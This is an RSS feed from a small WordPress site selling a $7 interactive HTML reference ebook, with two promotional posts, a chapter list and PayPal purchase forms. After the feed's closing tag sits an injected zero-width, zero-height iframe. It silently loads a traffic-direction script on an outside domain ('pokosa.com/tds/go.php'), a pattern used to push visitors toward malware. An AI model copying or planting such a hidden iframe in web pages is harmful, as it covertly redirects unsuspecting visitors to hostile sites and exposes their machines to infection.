<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>HTML Reference Guide</title>
	<atom:link href="http://the-html-reference.info/feed" rel="self" type="application/rss+xml" />
	<link>http://the-html-reference.info</link>
	<description>An HTML reference eBook to guide you to editing the html codes on your websites</description>
	<lastBuildDate>Tue, 17 May 2011 12:24:52 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1</generator>
		<item>
		<title>HTML Reference Guide</title>
		<link>http://the-html-reference.info/html-reference-guide</link>
		<comments>http://the-html-reference.info/html-reference-guide#comments</comments>
		<pubDate>Fri, 22 Apr 2011 00:35:11 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[html reference]]></category>
		<category><![CDATA[guide]]></category>
		<category><![CDATA[html]]></category>
		<category><![CDATA[html codes]]></category>
		<category><![CDATA[html tables]]></category>
		<category><![CDATA[learn]]></category>
		<category><![CDATA[reference]]></category>

		<guid isPermaLink="false">http://the-html-reference.info/?p=1</guid>
		<description><![CDATA[All websites whether created completely manually with line by line code or by the press of a single install button using such applications as WordPress &#8211; all have HTML as their main code. Being able to edit that code greatly &#8230; <a href="http://the-html-reference.info/html-reference-guide">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>All websites whether created completely manually with line by line code or by the press of a single install button using such applications as WordPress &#8211; all have HTML as their main code.</p>
<p>Being able to edit that code greatly expands the possibilities of making the site more attractive to viewers but is also required by many of the search engine optimization methods to get the website onto the first page of Google.</p>
<p>An HTML reference guide will help make the changes that are required &#8211; but this is no ordinary eBook &#8211; this is an interactive eBook that will help understand right from the basics to the more complex commands in <strong>HTML codes</strong>.</p>
<table border="0" width="85%">
<tbody>
<tr>
<td align="center">
<h2>Get your copy of the HTML Reference Guide for just<br />
<span style="text-decoration: line-through;"> </span> $7<br />
(~£4.70)</h2>
</td>
</tr>
<tr>
<td width="7%" align="center" valign="top">
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_xclick" />
<input name="business" type="hidden" value="d.corby@btinternet.com" />
<input name="lc" type="hidden" value="US" />
<input name="item_name" type="hidden" value="The HTML Reference" />
<input name="amount" type="hidden" value="7" />
<input name="currency_code" type="hidden" value="USD" />
<input name="no_note" type="hidden" value="1" />
<input name="no_shipping" type="hidden" value="1" />
<input name="rm" type="hidden" value="1" />
<input name="return" type="hidden" value="http://www.the-html-reference.info/Thank you HTML reference.html" />
<input name="cancel_return" type="hidden" value="http://www.the-html-reference.info" />
<input name="bn" type="hidden" value="PP-BuyNowBF:btn_buynowCC_LG.gif:NonHosted" />
<input name="submit" src="http://the-html-reference.info/wp-content/uploads/2011/04/013_38.gif" type="image" /><img src="https://www.paypal.com/en_US/i/scr/pixel.gif" border="0" alt="" width="1" height="1" />&nbsp;</p>
</form>
</td>
</tr>
</tbody>
</table>
<p>&nbsp;</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://the-html-reference.info/html-reference-guide/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Learn HTML with this Interactive Guide</title>
		<link>http://the-html-reference.info/learn-html-interactive-guide</link>
		<comments>http://the-html-reference.info/learn-html-interactive-guide#comments</comments>
		<pubDate>Fri, 22 Apr 2011 01:33:54 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[html reference]]></category>
		<category><![CDATA[ebook]]></category>
		<category><![CDATA[guide]]></category>
		<category><![CDATA[html]]></category>
		<category><![CDATA[interactive]]></category>
		<category><![CDATA[learn]]></category>

		<guid isPermaLink="false">http://the-html-reference.info/?p=19</guid>
		<description><![CDATA[If you view the source code behind any website you will see lines of text that are telling the web browser (Microsoft Internet Explorer, Firefox, Safari,Google Chrome etc) how to display the web page. Each line is a separate command &#8230; <a href="http://the-html-reference.info/learn-html-interactive-guide">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p><a href="http://the-html-reference.info/wp-content/uploads/2011/04/HTML-Banner.jpg"><img class="alignnone size-full wp-image-20" title="HTML Reference Guide" src="http://the-html-reference.info/wp-content/uploads/2011/04/HTML-Banner.jpg" alt="Banner for the interactive ebook" width="505" height="94" /></a></p>
<p>If you view the source code behind any website you will see lines of text that are telling the web browser (Microsoft Internet Explorer, Firefox, Safari,Google Chrome etc) how to display the web page.</p>
<p>Each line is a separate command of HTML and, although it may not seem it at first, is actually quite easy to understand.  Learning what these commands mean and how to edit them gives anyone a great advantage in making the site a better experience for the visitors but also to tune the site so that it can more easily be found by search engines.</p>
<p>This reference guide takes the student through from the very basic commands to some quite advanced ones &#8211; plenty for any editing of an existing website page even if it is a wordpress site like this one.</p>
<p>Learn how to get a step ahead of the other sites you are competing with by using this HTML interactive reference guide.</p>
<p><strong>What is in the guide?</strong></p>
<p>Table of contents:</p>
<p>Basic HTML<br />
Chapter 1: The Basics<br />
Chapter 2: The Common Tags<br />
Chapter 3: More Common Tags<br />
Chapter 4: A little more tags<br />
Chapter 5: Extended Fonts and Text Colour<br />
Chapter 6: Links and Images<br />
Chapter 7: Lists, lists, lists<br />
Chapter 8: Clean code, comments and escape codes<br />
Chapter 9: Navigation within a document</p>
<p>Advanced HTML<br />
Chapter 10: Tables<br />
Chapter 11: Using Frames<br />
Chapter 12: Using Meta Tags<br />
Chapter 13: Forms<br />
Chapter 14: Forms cont&#8217;d<br />
Chapter 15: Forms cont&#8217;d<br />
Chapter 16: Counters, Guestbooks and Search Engines<br />
Chapter 17: Graphics<br />
Chapter 18: HTML Style Basics</p>
<p>Templates to help you get started</p>
<p><a href="http://the-html-reference.info/wp-content/uploads/2011/04/html-tables.jpg"><img class="alignnone size-full wp-image-21" title="html tables" src="http://the-html-reference.info/wp-content/uploads/2011/04/html-tables.jpg" alt="example html code for tables" width="380" height="318" /></a></p>
<table border="0" width="85%">
<tbody>
<tr>
<td align="center">
<h2>Get your copy of the HTML Reference Guide for just<br />
<span style="text-decoration: line-through;"> </span> $7<br />
(~£4.70)</h2>
</td>
</tr>
<tr>
<td width="7%" align="center" valign="top">
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_xclick" />
<input name="business" type="hidden" value="d.corby@btinternet.com" />
<input name="lc" type="hidden" value="US" />
<input name="item_name" type="hidden" value="The HTML Reference" />
<input name="amount" type="hidden" value="7" />
<input name="currency_code" type="hidden" value="USD" />
<input name="no_note" type="hidden" value="1" />
<input name="no_shipping" type="hidden" value="1" />
<input name="rm" type="hidden" value="1" />
<input name="return" type="hidden" value="http://www.the-html-reference.info/Thank you HTML reference.html" />
<input name="cancel_return" type="hidden" value="http://www.the-html-reference.info" />
<input name="bn" type="hidden" value="PP-BuyNowBF:btn_buynowCC_LG.gif:NonHosted" />
<input name="submit" src="http://the-html-reference.info/wp-content/uploads/2011/04/013_38.gif" type="image" /><img src="https://www.paypal.com/en_US/i/scr/pixel.gif" border="0" alt="" width="1" height="1" />&nbsp;</p>
</form>
</td>
</tr>
</tbody>
</table>
]]></content:encoded>
			<wfw:commentRss>http://the-html-reference.info/learn-html-interactive-guide/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
